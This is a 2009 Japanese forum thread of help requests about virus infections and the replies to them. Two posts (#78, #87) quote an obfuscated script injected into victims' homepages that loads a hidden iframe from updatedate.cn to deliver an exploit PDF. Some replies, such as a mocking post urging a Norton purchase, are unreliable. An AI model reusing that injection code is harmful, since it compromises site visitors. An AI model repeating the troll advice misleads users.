09/06/29 19:53:58
>>42
とりあえずリカバリが一番手っ取り早いです。
中国製は駆除が面倒なので。
>>43
TROJ_GENなのでおそらく「Gneric」検出。
グレー状態、検体として提出すれば後日対応委されるかと
とりあえず、隔離されているなら、他には影響しないと思います。
>>45
URLリンク(oshiete1.goo.ne.jp)
システムクリーナーが有効らしい。
URLリンク(esupport.trendmicro.co.jp)
>>46
ウイルスというかスパイウエアっぽいが。
今の状態でNETに繋ぐのも危険なので、リカバリしては?
51:名無しさん@お腹いっぱい。
09/06/29 22:51:08
>>49
お前は何がしたいんだ?
52:名無しさん@お腹いっぱい。
09/06/29 23:06:56
53:名無しさん@お腹いっぱい。
09/07/01 11:37:38
【使用OS】 「Windows7」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
スタンバイの復帰に失敗して強制再起動すると下記画面が表示されます。
URLリンク(uproda.2ch-library.com)
某スレで質問したらウィルスらしいとのことでこちらで質問させていただきました。
54:905
09/07/01 13:46:38
>>53
うろ覚えですが結構厄介なマルウェアだったと記憶しています。
SUPERAntiSpywareで撃退出来たと思うのでインストールして試してみてください。
ただし、通常の正常なファイルの名前を変更したり等を行っている可能性が高いので。
駆除に成功してもリカバリーされる事をお勧めします。
55: ◆N9P3SuvBPo
09/07/01 18:09:26
>53
これは致命的なバグだな。
56:名無しさん@お腹いっぱい。
09/07/01 22:12:10
良くわからないんだけど
何故に初心者スレにWin7RCユーザーが来るのだろう……?
別にいいけど
57:名無しさん@お腹いっぱい。
09/07/01 23:02:50
あ、ここ違ったのね。
初心者スレと間違った。
58:名無しさん@お腹いっぱい。
09/07/02 16:03:35
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティZERO」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「無し」
sens.dllがトロイの木馬っぽいのに
感染したのですが
今の所なにも困ってません
あんまり重要なものじゃなさそうなのでそのままsens.dllを削除しちゃっていいですか?
59:53
09/07/02 16:47:21
>>54
SUPERAntiSpywareでスキャンしたとろこCookieが100個ぐらい検出されて削除したのですが
クッキー程度で起動時に変なアイコン表示されたりするのでしょうか?
マルウェアの具体的な詳細知りたいのですが検索のヒントになるようなキーワード覚えてないでしょうか?
60:名無しさん@お腹いっぱい。
09/07/04 03:08:28
>>58
ん。ちとマズイなその感染は。
修復できないならリカバリ。
URLリンク(detail.chiebukuro.yahoo.co.jp)
Sens.dllがなくなるとこうなる
URLリンク(okwave.jp)
61:名無しさん@お腹いっぱい。
09/07/04 13:23:46
>>60
回答ありがとうございます
一つのアカウントしかないので無理やり削除することにしました
62:名無しさん@お腹いっぱい。
09/07/07 02:07:43
ちょっと教えてもらいたいのですが、
1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ノイズかなんかかなぁぐらいで放置していましたが、
2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。
なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず
SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。
ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら
直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか?
または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。
申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。
お願いいたします。
63:62
09/07/07 02:09:45
DVDも流用しましたが、壊れていませんでした。
64:名無しさん@お腹いっぱい。
09/07/07 23:33:13
scrのファイル踏んでしまった
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
65:名無しさん@お腹いっぱい。
09/07/08 02:19:06
トレンドマイクロのオンラインスキャンを
始めようとすると、サービスを開始できません。とでるのですが
どうしてでしょうか?以前は問題なくできていたのですが・・・
OSはVISTA HEデス
66:名無しさん@お腹いっぱい。
09/07/08 04:45:21
>>64
そんなウィルスあるの?
こわい。
67:名無しさん@お腹いっぱい。
09/07/08 12:17:38
>>64
ファイルは消えた。OS再インストール
68:名無しさん@お腹いっぱい。
09/07/08 20:09:15
というか、そういうデータ破壊系のものが
昔からあるウイルスなんだが。
スパイじみた挙動を見せるタイプは最近になって増えたらしい。
69:名無しさん@お腹いっぱい。
09/07/12 13:35:17
src踏みました
フォルダ内の動画が画像ファイルに上書きされるのを見て
とにかく強制終了、再起動してもウィンドウズが立ち上がらないので
ウィンドウズを再インストール
なんとか起動後、デスクトップ画面は普通で
まずOSとは別のパーテーションにあるミュージックフォルダを確認
各アーティスト毎のフォルダ内は一見無事に見えましたが、
確認してる内にどんどん画像ファイルに上書きされてました・・・
そこでまたあせって強制終了、また立ち上がらなくなりました。
Cドライブだけ初期化して
別のパーテーションを残しても、ウィルスは残ってますかね?
やはり全ての初期化しか方法は無いでしょうか
70:名無しさん@お腹いっぱい。
09/07/12 13:36:31
すいませんsrcじゃなくscrでした
71:名無しさん@お腹いっぱい。
09/07/12 13:46:42
>やはり全ての初期化しか方法は無いでしょうか
うん
72:名無しさん@お腹いっぱい。
09/07/12 15:13:14
>>69
ウイルス対策ソフトいれててもscr踏むとそうなっちゃうの?
もしそうなら怖いね。
>>
>うん
役立たずすぎてワロタ
73:名無しさん@お腹いっぱい。
09/07/12 16:13:54
ファイル(レジストリ含む)を書き換えられたらどうしようもない
HIPSで防ぐしかないだろ
74:名無しさん@お腹いっぱい。
09/07/15 23:09:22
質問です。
私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。
せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので
それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。
昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります
これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます
こういう現象はウイルスのせいでしょうか?
僕はどうしたらいいでしょうか?
よろしくお願いします。
75:名無しさん@お腹いっぱい。
09/07/15 23:25:45
まるち
76:名無しさん@お腹いっぱい。
09/07/16 01:41:58
はわわ
77:名無しさん@お腹いっぱい。
09/07/16 04:20:51
きれいな水ですから…
78:名無しさん@お腹いっぱい。
09/07/16 19:05:32
HPを勝手にいじられました
中にあったのは
script
document.write("<"+"i"+"f"+"rame
src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1
width"+"=1"+">"+"</if"+"ram"+"e>");
/script
"や+をはぶくと
updatedate.cn/
ですが、どんなウィルスでしょう?
79:名無しさん@お腹いっぱい。
09/07/16 19:08:35
PDF系じゃないだろうか……
80:78
09/07/16 19:32:33
>>79
ありあがとうございます
素人ですみません
PDF系とはナンでしょうか?
パスワードを変えても
すぐHPをいじられてしまいます。
81:名無しさん@お腹いっぱい。
09/07/16 19:58:02
クリーンインストール推奨。
終わったらパスワード変更も忘れずに。
82: ◆N9P3SuvBPo
09/07/16 21:26:02
>80
ちなみに、そのupdatedate.cnのソース(難読化されたScript)の、VirusTotalのスキャン結果
URLリンク(www.virustotal.com)
83:名無しさん@お腹いっぱい。
09/07/16 21:34:33
私も>>78と同じ事になっています
一体どういう事が起こっているんでしょうか…
クリーンインストールというと、やはりウィルスなんですか?
私はFTPを使っています。
アップロード直後はそのソースは出ないんですけど…
84: ◆N9P3SuvBPo
09/07/16 21:48:32
どうやら、>>79の言う通りPDFを落させようとしますね…はい。
そのPDFファイルのソースが取れたので、VirusTotalに掛けようとしたら
「ファイルはすでに解析されてる」と出ました。結果です。
URLリンク(www.virustotal.com)
85:八頭 ◆YAGApwSaEw
09/07/16 22:36:46
このテのタイプだろうね
Exploit-PDF.b.gen ウイルス情報 マカフィー
URLリンク(www.mcafee.com)
情報だけシマに渡しておいた
86:名無しさん@お腹いっぱい。
09/07/16 23:55:12
>updatedate.cn
Adobe Readerの旧版にある脆弱性を突くPDFファイルを読み込ませて、
ウイルスを起動させる。(GENOウイルスと同じ)
FTPパスを抜くウイルスに感染してるとか?
87:83
09/07/18 13:00:40
でもFTPを使わないで
直接借りてるサーバー(FC2無料)からアップロードしても
数時間後にはそのタグが出てるんですよね。
私の所のタグでは、
<script>document.write("<iframe" +" sr"+"c=h" +"t"+"URLリンク(delzz)<) と h URLリンク(updatedate.cn)
ウィルスだとしたら、どう対処したらいいんですかね…
調べても上がってこなくって、結構焦ってます。
88:名無しさん@お腹いっぱい。
09/07/19 11:07:13
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:SQLインジェクション検出ツール
URLリンク(www.ipa.go.jp)
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:安全なウェブサイト運営入門
URLリンク(www.ipa.go.jp)
IPA 情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
URLリンク(www.ipa.go.jp)
89:名無しさん@お腹いっぱい。
09/07/19 11:17:27
C:\Program Files (x86)\Windows Live\Photo Gallery\WLXPhotoAcquireWizard.exe
Windows7x64でAvast!つかってるんだが、昨日の定義で上記のexeがウィルスとして検出されるようになったんだが、
これって誤爆じゃないの?
90:名無しさん@お腹いっぱい。
09/07/20 01:34:24
winnyをよくやってるんですが、winnyみたいに日本でしか使われていないソフトに発生する
ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか?
winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか?
アホみたいな質問で済みません・・。
91:名無しさん@お腹いっぱい。
09/07/20 16:39:10
やめたほうがいいな
92:名無しさん@お腹いっぱい。
09/07/20 17:23:43
comodo使ってるんですが
Firefoxを開いただけで送信接続数が600とかになることがあります
なにかトロイにでも感染したんでしょうか?
93:名無しさん@お腹いっぱい。
09/07/21 17:09:17
フレッツウィルスクリアでTROJ Gen.4X2633が検出されたんですがこれはなんなんでしょう?
94:名無しさん@お腹いっぱい。
09/07/21 17:41:22
>>93
TROJ Gen.4X2633
95:名無しさん@お腹いっぱい。
09/07/22 02:12:28
【使用OS】 『XP sp3』
【PCスペック】 『CPU: 3.00GHz 、メモリ: 1.96GB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスバスター 2009』
【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』
【回線の種類・ルータの有無】 『光回線でルータ使用』
【具体的な症状】
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える
気になってカペルスキーオンラインスキャンをしたら
C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。
C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても
195.tmpというファイルが見つかりません。
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
このウィルスは関係がありますか?
駆除するには再セットアップでしょうか?
96:名無しさん@お腹いっぱい。
09/07/22 02:23:31
>>95
OTL
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
97:名無しさん@お腹いっぱい。
09/07/22 02:32:16
>>96は何を勘違いしてるのか。
ウイルスバスター を 使ってる人に ウイルスバスター と 関係の無い シマンテック社に
訳の分からんもん送れって アホか。
ノートン が 対応しても ウイルスバスター は 対応しませんよね。
意味のないことするな!
あと そんな怪しげなファイル 使わねーって。
98:名無しさん@お腹いっぱい。
09/08/13 23:21:27
ドライバをランダムに削除するウィルスってあるんですか?
ググっても出てこないんですが。
99:名無しさん@お腹いっぱい。
09/08/14 01:44:00
他スレの書き込み。
"OTL.exe"は、McAfeeでは、「検出済み: Artemis!3974A453958C (トロイの木馬)」
となって、DL出来ないよ。一時的にシールド外せばDLして調べることも出来るけど、やめた。
"OTL.exe"をVTでスキャンすると
CAT-QuickHeal 10.00 2009.08.04 (Suspicious) - DNAScan
eSafe 7.0.17.0 2009.08.03 Suspicious File
McAfee+Artemis 5697 2009.08.03 Artemis!3974A453958C
McAfee-GW-Edition 6.8.5 2009.08.04 Heuristic.LooksLike.Win32.Suspicious.C!83
Sophos 4.44.0 2009.08.04 Mal/Emogen-Y
で検出されたが
100:八頭 ◆YAGApwSaEw
09/08/15 03:59:23
>>99
URLリンク(www.virustotal.com)
CAT-QuickHealとSophosが定義修正してるから
McAfeeに連絡しておいた方がいいよ
eSafeは連絡しても修正してくれないから放っておけw
101:八頭 ◆YAGApwSaEw
09/08/15 04:17:29
>>99
100は旧バージョンの結果だったスマンヌ
旧OTL File size: 501760 bytes
URLリンク(www.virustotal.com)
現OTL File size: 514048 bytes
URLリンク(www.virustotal.com)
102:名無しさん@お腹いっぱい。
09/08/17 22:00:45
なんだもう1001になったのか
103:名無しさん@お腹いっぱい。
09/08/18 19:52:40
PC初心者なんだけど、ファイル共有ソフト使ってなければ
ファイルとか画像が勝手に流出することはないの?
104:名無しさん@お腹いっぱい。
09/08/18 20:31:16
>>103
そんなことないよ。
ウィルスに感染してバックドアしかけられたら、気づかないうちにHDDの中身を抜き取られてることもある。
105:名無しさん@お腹いっぱい。
09/08/18 22:05:25
>>103
山田オルタでググってみ
106:名無しさん@お腹いっぱい。
09/08/19 09:57:44
【使用OS】 「XP home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「AVG spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
起動時にマイドキュメントが開いてしまうので
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,
に書き換えて再起動したところ、ログインしても瞬時にログオフされるようになりました。
セーフモードにしても同様です。
検索してもこの症状の人は解決には至っておらず、とても困っております。
もうリカバリーかOS再インスコしか道がないのでしょうか…
どうしても残しておきたいデータがあって…
107:名無しさん@お腹いっぱい。
09/08/19 11:31:42
>>106
OTL
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
108:名無しさん@お腹いっぱい。
09/08/19 11:40:52
>>107(続き)
Norton Internet Security 2009を購入します
URLリンク(a.imagehost.org)
インストール>アップグレード>スキャン
A-Squared Freeをインストール>スキャン
ここまでやればHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,が正常になると思ってますw
リカバリを奨める似非回答者が現れる可能性がありますので、注意してくださいね
109:名無しさん@お腹いっぱい。
09/08/19 11:47:18
>>107
レスありがとうございます。
デスクトップにDLしようにも、デクストップが見えた瞬間くらいにログオフしてしまい、
DLができない状態です。。。
今書き込んでいるのはサブのPCからです><
110:名無しさん@お腹いっぱい。
09/08/19 11:51:01
データ吸い出したいだけならKNOPPIX等のCDで起動できるLinux使って
USBメモリ等にデータをコピー
Windowsを起動できるようにしたいなら、回復コンソールを起動して、
システムの復元領域からレジストリをコピー
でも、たぶんOS再インストールしちゃったほうが、時間が無駄にならなくてすむよ
111:名無しさん@お腹いっぱい。
09/08/19 12:09:21
>>110
やっぱり外側から何かしないといけないですよね・・・
諦めて再インスコ検討します;
112:名無しさん@お腹いっぱい。
09/08/19 15:27:04
>>110
KNOPPIXというものを検索して試行錯誤しながらバックアップしたいファイルを救出することができました!
ありがとうございました!
これから再インストールしたいと思います。
113:名無しさん@お腹いっぱい。
09/08/19 16:37:07
>>103
P2Pが原因じゃなくてウイルスが原因
P2Pやってなくても何かの拍子でウイルス踏めば駄々漏れ
114:名無しさん@お腹いっぱい。
09/08/27 09:09:19
【使用OS】Windows XP HE SP3
【Microsoft Update(MU)の状態】常に最新
【使用セキュリティソフトとバージョン】ノートンインターネットセキュリティ2009 16.7.2.10
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】特に無し
【ルータの有無】有り
PCの電源を切るときに、半分くらいの確率で「ccSvcHstプログラムの終了中です」「このプログラムは応答していません」と表示されます。
これ自体はノートン関連のファイルという事がわかっているのですが、問題はこのエラーが表示された際に必ずセットで表示される、以下の画像のエラーです。
URLリンク(up2.viploader.net)
「ccSvcHstプログラムの終了中です」が表示されずにすんなりと終了する時には表示されません。
必ずccSvcHstとセットになっています。
自分なりに調べてみたところn.exeはUSBウイルスだと分かったのですが、
・フォルダの設定で隠しファイルはちゃんと表示できる
・各ドライブ直下にautorun.infが無い
・Cドライブ直下にn.exeやvb8jc.exeなどが無い
など、感染している症状は見当たりませんでした。
また、PCにインストールしているノートンインターネットセキュリティ2009と
カスペルキーのオンラインスキャンを実行しましたがウイルスは発見できませんでした。
症状としては感染しているようには見えないのですが、どうしても『n』というプログラムが気になります。
これはウイルスではないのでしょうか?またウイルスだった場合、手動での確認が不可能な段階まで進行しているのでしょうか?
不安でご飯も3杯しか喉を通りません助けてください。
115:名無しさん@お腹いっぱい。
09/08/27 10:05:32
"n"ってのは必ずしもファイル名とは限らないんじゃね?
さっさとリカバリしちゃったほうが確実だしご飯がすすむと思うよ。
116:名無しさん@お腹いっぱい。
09/08/27 14:03:06
JS:ScriptIP-inf [Trj]
これ何か知ってる?
ネサフしてるとavastが何回も拾う
が、データベースに載ってもいない
117:名無しさん@お腹いっぱい。
09/08/29 18:58:50
今VAIOtypePをスタンバイから復帰させたんだけど、
その瞬間緑とオレンジのブロックが左に流れ続ける画面になってしまった。
fとかoとかがそのブロックの中に入ってたんだけど、
再起動したら戻った・・・
これってウィルス?とりあえず今からスキャンしてみる・・・
118:名無しさん@そうだ選挙に行こう
09/08/30 09:24:44
【使用OS】 「win2k_SP4」(多分)
【Microsoft Update(MU)の状態】 08/30現時点・最新
【使用セキュリティソフトとバージョン】 「AVG フリー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Downloader.Generic8.BKDE
」
トロイってことしか分からない。 危険度は恐らく低いが情報求む。
ちなみに、検出されたのは「Orbit」ってDL支援ソフトの「~net.exe」
~←なんて書いてあったか隔離した記録ごと消したから忘れてしまった。
119:名無しさん@そうだ選挙に行こう
09/08/30 09:44:20
XP使っているのですが、(それ以外よくわかりません)
1ヶ月ぐらい前にブラウザのバーが勝手に上がり下がりして変でした。
今度は、電源が勝手に消えて着いたりして、主電源も効かなくなるので
ウイルスバスターを入れてみました。
ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて、
ウイルスバスターで29個の何かが検出されたのですが、
これがウイルスですか?
こういうのが、PCを壊すことはあるのでしょうか?
120:名無しさん@そうだ選挙に行こう
09/08/30 19:04:56
>>119
> ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて
アンチウイルス入れないで数年使えば、どんな状態になっていてもおかしくない
あなたの言う症状がウイルスのせいか何なのか断定は出来ないが、もうまともなpcの状態じゃないと思う
121:名無しさん@お腹いっぱい。
09/08/30 22:02:29
>>119
PCが壊れる事は滅多にはないが無くは無い
一度OS入れ直す事を強く推奨
122:名無しさん@お腹いっぱい。
09/08/30 22:41:55
>>120
>>121
ありがとうございます。
電源落ちはなくなりましたが、また調子悪くなるかもしれないので、
データーだけ取ってからリカバリに挑戦してみます。
ウイルスソフトが大切だとはじめて思いました。
(数年ってもう10年近いです)
私は絶対にウイルスになんて感染しないって自信過剰でした。
123:名無しさん@お腹いっぱい。
09/08/31 03:47:32
OS XP
対策ソフト一切無しで、エッチ系サイト閲覧してたら、急にダウンロードとセットアップが始まってしまいました。
アンインストールしたけど
ネットしてたら、別ウィンドウで知らないサイトが、ピョコピョコ出るように、なりました。
Yahooメールとか見てたら頻繁に
ヤフオクのID即止めた方が良いですか?
キャノンのウイルス対策ソフトの1ヶ月体験インストールしてみたけど、感染ファイル46個削除になったけど
知らないサイトがピョコピョコは解消されません
ウイルスバスターも、入れてみたら、激重になって
何も出来ません。
助けて下さい。
124:名無しさん@お腹いっぱい。
09/08/31 05:09:14
まずアンチウイルスソフトを複数入れるのは止めろ。
体験版の多くはスキャンのみで駆除できないことがあるから、体験版を過信するのは大きな間違い。
つかバスターはザルのくせして激重だ。
それとPCにダウンロードされたのはブラウザハイジャック型のマルウエアとバックドアだと思う。
Yahoo IDや様々なネットサービスを一旦全て停止し、マルウエアやスパイウエアを駆除するソフトをインストールして、定義ファイルをUpdate後にスキャンしてみるといいよ。
SUPERAntispywareだとブラウザハイジャック防止機能もあるからオススメ。
125:名無しさん@お腹いっぱい。
09/08/31 09:21:30
>>124
ご回答ありがとうございます。
ウイルスバスターが激重で、アンインストールするのにも、即フリーズして何も出来ないんですが
修理に出した方が早いですか?
F5押しながら再起動してみたけど
フリーズ
二つの体験版が起動してすぐ動いてるからだろうけど
何か、ウイルスバスターアンインストール出来る方法ありましたら、教えて下さい。
データのバックアップも出来ません。
126:名無しさん@お腹いっぱい。
09/08/31 10:03:19
ここはいつから初心者板になったんだろう
>>123
いいか?念の為LANケーブル引っこ抜いて、セーフモードで立ち上げて
そこからアンインストール作業を試して見てダメだったら、リカバリCDでも突っ込んでから起動するんだな。
今出てきた言葉で分からない事があるならネットカフェでググるなり、本屋か図書館に行ってパソコン用語辞典調べるなりしな
即リカバリをすると無論バックアップは取れないが、自業自得だ
みんな調べたり、痛い思いしながら相応に育ってるんだ
本一冊買えば基礎知識くらいは付くんだから、それくらいしてからPCいじって欲しい
127: ◆N9P3SuvBPo
09/09/01 01:48:06
経験に勝る知識はない。
128:名無しさん@お腹いっぱい。
09/09/01 07:52:03
URLリンク(www.yamasaki-sunnet.co.jp)
ここのページ開こうとすると、
ウイルス警告出るんですけど
大丈夫ですかねぇ。
ウイルス名:HTML:IFrame-EC [Trj]
129:名無しさん@お腹いっぱい。
09/09/01 18:36:10
xp ウイルスバスターver2009 troj_generic.dit が検出されました。
IE5というフォルダ(?)にあると表示されましたが、フォルダオプションで
全てを表示させても見当たりません。
害の有無・削除方法など、教えてください。
バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
130:名無しさん@お腹いっぱい。
09/09/01 18:55:54
インターネット一時ファイルを削除
131: ◆N9P3SuvBPo
09/09/01 20:53:45
>128
ページ内に<p class="img"><iframe frameBorder="0" allowTransparency=以下ryがあり
そのコードに反応してるんでは?と思います。
132:名無しさん@お腹いっぱい。
09/09/02 05:43:11
ウィルスに感染したらどうすればいいですかね
133:名無しさん@お腹いっぱい。
09/09/02 06:52:55
リカバリ
134:129
09/09/02 08:46:41
上記の通り、バスタースレでも質問していたところ、
誤検知ということで、無害みたいです。
>>130 ありがとう。
135:名無しさん@お腹いっぱい。
09/09/02 10:50:32
最近のゆとりーはマルチって言葉すら知らないのだろうか?と素朴な疑問
136:名無しさん@お腹いっぱい。
09/09/02 12:10:10
マルチ市ねって言っても帰ってくれないでしょ、この手の奴は
137:名無しさん@お腹いっぱい。
09/09/02 12:13:19
あと、マルチだって言われてるのに相手するバカもいるからね
自演かもしれないけど
138:名無しさん@お腹いっぱい。
09/09/02 12:45:59
>>135-137
マルチ言及厨のほうがウザ
>バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
丁寧に説明してるからまだいいかと。
139:名無しさん@お腹いっぱい。
09/09/02 12:51:36
という自演
140:名無しさん@お腹いっぱい。
09/09/02 13:18:49
はいさらっと終わらして次いこーぜー
141:名無しさん@お腹いっぱい。
09/09/04 04:24:58
画面が時々フリーズして困っています。
特徴はフリーズした瞬間「バイーン」と音がします。
スパイウェアを仕込まれたのでしょうか?
これが何か分かる方おしえてください。
142:名無しさん@お腹いっぱい。
09/09/05 12:43:22
田代ウイルスっていうのは、田代砲のことなんですか?
イメージファイルをDVDに焼いてマウントしたら、ドライブにnamikare.netと表示されて、
自動実行の直前で食い止めたんですが、もし感染したらどんな症状がでるのでしょう?
143:名無しさん@お腹いっぱい。
09/09/06 19:15:46
パソコンのウィルスを作って、バラまいたら、
どういう法律に触れるのでしょうか?
144:名無しさん@お腹いっぱい。
09/09/06 23:16:28
初心者です。(※一応ウィルスバスター付)
ネットの履歴に
・r・・・s・・・[・^
というものがあり、行った覚えが無いのですがこれは何かのウィルスなのでしょうか?
気付いたら履歴に残っており、同時期から急に動作異常が発生しています。
もしご存知でしたら名称と対策をお願い致します。
145:八頭 ◆YAGApwSaEw
09/09/07 01:06:36
>>144
それだけではなんともいえないが
INTERNET Watch
情報処理推進機構(IPA)は3日、ブラウザの設定を改変したり、不正な機能を追加する 2009/9/3
悪質なソフトウェア「ブラウザハイジャッカー」の被害が出ているとして注意喚起した
URLリンク(internet.watch.impress.co.jp)
→ PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
スレリンク(sec板:5番)
146:名無しさん@お腹いっぱい。
09/09/11 01:34:40
Janeで2ちゃんねる見てるのですが
プロバイダ板の
「MX・ny等で帯域制限をかけるISPについて云々」
というスレを開いたら
トロイの木馬が検出されました。
スレッドを開くだけでウイルス感染する事なんてあるんでしょうか?
147:名無しさん@お腹いっぱい。
09/09/11 10:42:43
帰れ
148:名無しさん@お腹いっぱい。
09/09/11 21:41:39
家のPCが突然シャットダウンしたり一時的にインターネットに接続出来なく
なります。
他にもタブが突然増えだしたりシャットダウン出来なくなってしまいます。
一応ウイルスドクターを入れていてスキャンをしてもウィルスは検出されません。
これはPCに何か問題があるのでしょうか?
それともウィルスが入っているのでしょうか。
149:名無しさん@お腹いっぱい。
09/09/12 00:29:10
>>148
テンプレートは飾りではないのです。
>>1はまともなレスがほしいがひとが利用するテンプレ。
>>2-3は予防のについて
>>5-6はルータ無し且つリカバリした状態がXPsp1以前なら感染するマルウエア。
>>9はおまいさんの疑問への答え。
150:名無しさん@お腹いっぱい。
09/09/18 17:56:21
【使用OS】 「Windows Vista (TM) Business Professional (6.0, Build 6002 Service Pack 2)」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4/BitDefenderコマンドライン版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「WindowsDefender」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無」
いつの間にか、HDD内の画像サイズの比率が滅茶苦茶になっていました。
自分でコンバートした覚えもなく、思い当たる点もありません。
フルスキャンしましたが何も検知されませんでした。
もし、HDD内の画像ファイルを破壊するようなウイルスがあったら教えてくださいm(_ _)m
サンプル↓
URLリンク(imagepot.net)
151:名無しさん@お腹いっぱい。
09/09/18 22:24:26
>>150
ファイル交換及びシェア系サイトに
壊滅的な被害をもたらすリスクが多い罠
152:名無しさん@お腹いっぱい。
09/09/19 00:08:26
梨花のオフィシャルブログを見るとadode readerが勝手に開いて、ファイルが壊れてると出て
ノートンが高リスクと表示されます。なんなんでしょうか?分かる方いらっしゃいますか?
このページです
URLリンク(www.smooche.jp)
